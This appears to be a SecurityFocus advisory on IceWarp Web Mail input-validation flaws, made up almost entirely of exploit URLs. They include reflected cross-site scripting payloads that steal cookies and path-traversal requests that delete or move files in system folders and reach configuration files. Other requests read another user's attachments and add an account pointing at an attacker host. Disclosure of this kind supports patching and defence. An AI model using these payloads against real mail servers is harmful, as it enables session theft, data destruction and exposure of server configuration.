IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities

The following examples are available:

http:// www.example.com:32000/mail/accountsettings.html->Add->”Account name”,”Incoming mail server”,”User name” = <script>alert(document.cookie) </script>
http:// www.example.com:32000/mail/search.html->”Search string” = <script> alert(document.cookie) </script>
http://www.example.com:32000/mail/viewaction.html?Move_x=1&user=../../hacker
http://www.example.com:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32
http://www.example.com:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
http://www.example.com:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox
http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]
http://www.example.com:32000/mail/folders.html?id=[sessionid]&folderold=....//....//....//….//….//winnt&folder=....//....//....//….//….//linux&Save_x=1


 

Privacy Statement
Copyright 2010, SecurityFocus